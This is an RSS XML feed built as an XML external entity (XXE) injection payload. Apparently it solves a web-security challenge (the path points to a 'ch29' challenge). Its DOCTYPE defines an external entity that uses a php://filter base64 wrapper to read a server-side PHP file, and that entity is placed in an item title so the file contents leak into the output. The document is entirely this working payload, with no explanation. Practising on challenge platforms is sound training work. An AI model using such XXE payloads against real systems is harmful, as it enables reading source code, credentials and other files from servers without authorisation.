<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE rss [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/challenge/web-serveur/ch29/index.php?action=auth">

    ]>

    <rss version="1.0" xmlns:atom="http://www.w3.org/2005/Atom">

        <channel>

            <title>site</title>

            <link>http://site.com/</link>

            <description>desc</description>

            <lastBuildDate>Sun, 03 Apr 2016 00:00:00 -0000</lastBuildDate>

            <item>

                <title>&xxe;</title>

                <link>http://site.com</link>

                <description>a post</description>

                <author>author@example.com</author>

                <pubDate>Sun, 03 Apr 2016 00:00:00 -0000</pubDate>

            </item>

    </channel>

</rss>
